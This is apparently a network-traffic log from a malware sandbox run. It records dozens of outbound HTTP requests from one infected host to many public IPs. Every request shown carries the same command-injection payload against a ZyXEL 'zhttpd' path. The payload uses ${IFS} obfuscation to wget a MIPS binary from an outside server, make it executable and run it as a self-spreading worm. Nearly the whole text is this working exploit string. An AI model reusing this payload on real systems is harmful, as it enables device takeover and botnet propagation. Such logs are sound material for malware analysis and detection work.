                                    Jan 13, 2024 19:02:39.299884081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5747192.168.2.134147627.178.64.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.299949884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5748192.168.2.1354192107.190.93.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300004959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5749192.168.2.133681281.100.154.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300062895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5750192.168.2.135515278.231.143.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300120115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5751192.168.2.13442125.68.18.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300208092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5752192.168.2.13420089.147.161.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300254107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5753192.168.2.1349606192.212.70.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300290108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5754192.168.2.134587879.129.230.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300345898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5755192.168.2.1347934137.130.17.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300416946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5756192.168.2.1347724208.18.23.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300491095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5757192.168.2.1360876143.193.168.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300568104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5758192.168.2.1342606204.149.28.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300647974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5759192.168.2.1360898204.50.19.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300677061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5760192.168.2.135630259.249.190.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300703049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5761192.168.2.134578878.24.236.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300777912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5762192.168.2.135418861.73.45.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300822973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5763192.168.2.1345370196.171.2.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300893068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5764192.168.2.134949457.194.7.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300931931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5765192.168.2.1351674102.43.34.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.300982952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5766192.168.2.133358276.129.104.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.301052094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5767192.168.2.133896218.200.115.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.301125050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5768192.168.2.1359106180.195.56.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.301158905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5769192.168.2.1360952118.199.41.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.301233053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5770192.168.2.13555969.47.95.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.301318884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5771192.168.2.1340468196.146.126.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.301378965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5772192.168.2.133916089.48.51.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.301454067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5773192.168.2.1345270213.122.55.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.301518917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5774192.168.2.133316691.155.170.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.301557064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5775192.168.2.1354158155.187.152.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.301609993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5776192.168.2.135990451.214.244.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.301652908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5777192.168.2.1355004207.25.107.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.301682949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5778192.168.2.1355938143.111.131.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.301738977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5779192.168.2.1342614166.14.179.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.301785946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5780192.168.2.1339824153.129.70.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.301850080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5781192.168.2.1338422184.247.98.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.301923037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5782192.168.2.1359694111.149.109.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.301969051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5783192.168.2.1341836176.141.249.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302041054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5784192.168.2.1340058212.229.109.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302103043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5785192.168.2.1335830147.69.112.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302181005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5786192.168.2.133496273.113.95.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302222013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5787192.168.2.1333802197.159.249.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302261114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5788192.168.2.1351882162.190.46.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302329063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5789192.168.2.135680425.172.70.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302362919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5790192.168.2.133799682.27.73.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302418947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5791192.168.2.1356900111.205.57.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302489042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5792192.168.2.134320073.171.25.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302524090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5793192.168.2.1356822219.131.145.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302566051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5794192.168.2.135020219.163.171.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302633047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5795192.168.2.134872251.101.144.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302701950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5796192.168.2.1345654221.155.120.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302735090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5797192.168.2.1343356158.126.148.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302826881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5798192.168.2.1359960171.237.17.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302850008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5799192.168.2.1350262179.126.251.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302910089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5800192.168.2.1341250118.96.171.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.302937984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5801192.168.2.135866860.111.154.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.303000927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5802192.168.2.1352902140.111.55.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.303073883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5803192.168.2.1357256161.220.16.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.303111076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5804192.168.2.1354042162.83.150.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.303172112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5805192.168.2.1355498138.197.58.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.303235054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5806192.168.2.133454624.103.166.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.308656931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5807192.168.2.134870813.243.54.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.308682919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5808192.168.2.133677039.14.155.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.308734894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5809192.168.2.1357230162.232.98.144443
                                    TimestampBytes transferredDirectionData
